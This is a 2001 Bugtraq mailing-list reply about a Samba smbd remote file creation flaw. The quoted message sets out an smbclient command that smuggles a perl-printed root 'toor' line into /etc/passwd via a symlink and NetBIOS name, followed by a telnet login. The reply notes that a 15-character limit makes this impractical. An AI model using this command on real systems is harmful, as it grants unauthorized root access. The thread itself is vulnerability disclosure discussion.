Bugtraq mailing list archives
Re: smbd remote file creation vulnerability
From: Daniel Jacobowitz <dmj+ () andrew cmu edu>
Date: Mon, 2 Jul 2001 14:30:41 -0700
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
I was hoping to test this out but haven't been able to so here goes on theoretical... How to make this exploit a remote one using AFS or other remote file systems. What does this exploit need on the remote side?? A symlink; soo... on a AFS system ,preferably one of a well known node that most AFS servers would have in their CellServDB such as andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named x.log like ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log now make the symlink world readable... then all you need is UNIXes running samba in the vulnerable configuration and running AFS. smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N telnet afs.machine login as toor if root logins aren't allowed make a dummy account first, login with that then make a toor account ontop of that and su over to toor.
Remember, the log path must be within 15 characters to fit in a netbios name! You're not going to get anywhere on andrew, or most other AFS paths, with that restriction. -- Daniel Jacobowitz Carnegie Mellon University MontaVista Software Debian GNU/Linux Developer
Current thread:
- Re: smbd remote file creation vulnerability Christopher William Palow (Jul 02)
- Re: smbd remote file creation vulnerability Dan Stromberg (Jul 03)
- Re: smbd remote file creation vulnerability Daniel Jacobowitz (Jul 03)